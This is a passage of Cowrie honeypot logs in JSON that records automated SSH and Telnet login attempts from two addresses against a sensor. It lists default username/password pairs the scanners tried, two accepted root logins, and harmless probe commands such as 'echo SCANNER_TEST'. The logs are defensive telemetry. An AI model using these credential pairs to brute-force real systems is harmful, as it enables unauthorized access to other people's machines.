es256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:43.353257Z","src_ip":"212.227.125.160","session":"cb69c5a8f39c"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:44.212675Z","src_ip":"212.227.125.160","session":"cb69c5a8f39c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:45.430376Z","src_ip":"212.227.125.160","session":"cb69c5a8f39c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59514,"dst_ip":"1.2.3.4","dst_port":23,"session":"db25d7d68d51","protocol":"telnet","message":"New connection: 212.227.235.229:59514 (1.2.3.4:23) [session: db25d7d68d51]","sensor":"my-vps","timestamp":"2025-08-28T06:29:48.844032Z"}
{"eventid":"cowrie.login.failed","username":"tech","password":"tech","message":"login attempt [tech/tech] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:49.496396Z","src_ip":"212.227.235.229","session":"db25d7d68d51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53230,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78cfb7f527b","protocol":"ssh","message":"New connection: 212.227.235.229:53230 (1.2.3.4:22) [session: d78cfb7f527b]","sensor":"my-vps","timestamp":"2025-08-28T06:29:49.627995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:49.628696Z","src_ip":"212.227.235.229","session":"d78cfb7f527b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:49.883983Z","src_ip":"212.227.235.229","session":"d78cfb7f527b"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-28T06:29:51.382476Z","src_ip":"212.227.235.229","session":"d78cfb7f527b"}
{"eventid":"cowrie.session.closed","duration":2.79258394241333,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:51.635393Z","src_ip":"212.227.235.229","session":"db25d7d68d51"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:29:52.639415Z","src_ip":"212.227.235.229","session":"d78cfb7f527b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44220,"dst_ip":"1.2.3.4","dst_port":23,"session":"d6de283ab710","protocol":"telnet","message":"New connection: 212.227.235.229:44220 (1.2.3.4:23) [session: d6de283ab710]","sensor":"my-vps","timestamp":"2025-08-28T06:29:58.221661Z"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:29:59.017986Z","src_ip":"212.227.235.229","session":"d6de283ab710"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:29:59.038601Z","src_ip":"212.227.235.229","session":"d6de283ab710"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45834,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c7e86b1c254","protocol":"ssh","message":"New connection: 212.227.125.160:45834 (1.2.3.4:22) [session: 2c7e86b1c254]","sensor":"my-vps","timestamp":"2025-08-28T06:29:59.040018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:29:59.168139Z","src_ip":"212.227.125.160","session":"2c7e86b1c254"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:29:59.261517Z","src_ip":"212.227.125.160","session":"2c7e86b1c254"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T06:29:59.397330Z","src_ip":"212.227.235.229","session":"d6de283ab710"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:00.147516Z","src_ip":"212.227.125.160","session":"2c7e86b1c254"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:00.447976Z","src_ip":"212.227.235.229","session":"d6de283ab710"}
{"eventid":"cowrie.session.closed","duration":2.231006383895874,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:00.452592Z","src_ip":"212.227.235.229","session":"d6de283ab710"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:01.370861Z","src_ip":"212.227.125.160","session":"2c7e86b1c254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41702,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce34713c6d7a","protocol":"ssh","message":"New connection: 212.227.235.229:41702 (1.2.3.4:22) [session: ce34713c6d7a]","sensor":"my-vps","timestamp":"2025-08-28T06:30:05.774860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:05.775937Z","src_ip":"212.227.235.229","session":"ce34713c6d7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:06.019339Z","src_ip":"212.227.235.229","session":"ce34713c6d7a"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:06.751438Z","src_ip":"212.227.235.229","session":"ce34713c6d7a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:07.997494Z","src_ip":"212.227.235.229","session":"ce34713c6d7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35194,"dst_ip":"1.2.3.4","dst_port":22,"session":"d93b0c0af750","protocol":"ssh","message":"New connection: 212.227.125.160:35194 (1.2.3.4:22) [session: d93b0c0af750]","sensor":"my-vps","timestamp":"2025-08-28T06:30:15.298077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:15.303256Z","src_ip":"212.227.125.160","session":"d93b0c0af750"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:15.515860Z","src_ip":"212.227.125.160","session":"d93b0c0af750"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:16.377604Z","src_ip":"212.227.125.160","session":"d93b0c0af750"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:17.595478Z","src_ip":"212.227.125.160","session":"d93b0c0af750"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40286,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3ef8c901a82","protocol":"telnet","message":"New connection: 212.227.125.160:40286 (1.2.3.4:23) [session: f3ef8c901a82]","sensor":"my-vps","timestamp":"2025-08-28T06:30:20.272773Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:30:20.357697Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:30:20.443069Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T06:30:20.444215Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T06:30:20.445068Z","src_ip":"212.227.125.160","session":"f3ef8c901a82"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41384,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bdc6742a6ce","protocol":"ssh","message":"New connection: 212.227.235.229:41384 (1.2.3.4:22) [session: 3bdc6742a6ce]","sensor":"my-vps","timestamp":"2025-08-28T06:30:21.815031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:21.815764Z","src_ip":"212.227.235.229","session":"3bdc6742a6ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:22.070515Z","src_ip":"212.227.235.229","session":"3bdc6742a6ce"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:22.850267Z","src_ip":"212.227.235.229","session":"3bdc6742a6ce"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:24.107752Z","src_ip":"212.227.235.229","session":"3bdc6742a6ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43904,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0cc7e19a71","protocol":"ssh","message":"New connection: 212.227.125.160:43904 (1.2.3.4:22) [session: 4c0cc7e19a71]","sensor":"my-vps","timestamp":"2025-08-28T06:30:31.520435Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:31.521419Z","src_ip":"212.227.125.160","session":"4c0cc7e19a71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:31.750782Z","src_ip":"212.227.125.160","session":"4c0cc7e19a71"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:32.440060Z","src_ip":"212.227.125.160","session":"4c0cc7e19a71"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:33.671668Z","src_ip":"212.227.125.160","session":"4c0cc7e19a71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f34020ecaa","protocol":"ssh","message":"New connection: 212.227.235.229:51502 (1.2.3.4:22) [session: d2f34020ecaa]","sensor":"my-vps","timestamp":"2025-08-28T06:30:37.991590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:37.993160Z","src_ip":"212.227.235.229","session":"d2f34020ecaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:38.242653Z","src_ip":"212.227.235.229","session":"d2f34020ecaa"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:38.991654Z","src_ip":"212.227.235.229","session":"d2f34020ecaa"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:40.243121Z","src_ip":"212.227.235.229","session":"d2f34020ecaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41814,"dst_ip":"1.2.3.4","dst_port":22,"session":"699b3a208d68","protocol":"ssh","message":"New connection: 212.227.125.160:41814 (1.2.3.4:22) [session: 699b3a208d68]","sensor":"my-vps","timestamp":"2025-08-28T06:30:48.038289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:48.057245Z","src_ip":"212.227.125.160","session":"699b3a208d68"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:48.267431Z","src_ip":"212.227.125.160","session":"699b3a208d68"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:49.136660Z","src_ip":"212.227.125.160","session":"699b3a208d68"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:50.356996Z","src_ip":"212.227.125.160","session":"699b3a208d68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34766,"dst_ip":"1.2.3.4","dst_port":22,"session":"4359018ceaab","protocol":"ssh","message":"New connection: 212.227.235.229:34766 (1.2.3.4:22) [session: 4359018ceaab]","sensor":"my-vps","timestamp":"2025-08-28T06:30:54.708429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:30:54.709074Z","src_ip":"212.227.235.229","session":"4359018ceaab"}
